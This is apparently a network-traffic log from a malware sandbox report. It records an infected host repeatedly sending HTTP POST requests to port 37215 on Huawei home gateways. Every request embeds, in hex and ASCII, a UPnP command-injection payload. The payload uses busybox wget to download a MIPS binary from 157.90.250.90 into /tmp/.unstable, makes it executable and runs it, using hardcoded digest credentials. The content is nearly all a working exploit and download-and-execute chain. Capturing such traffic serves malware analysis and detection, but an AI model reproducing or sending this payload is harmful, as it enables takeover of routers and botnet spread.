                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:05.351608992 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:07.335287094 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:11.302704096 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:19.237584114 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:35.111356974 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          448192.168.2.2348078156.235.99.3037215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.497384071 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:04.359719992 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:05.351599932 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:07.335314989 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
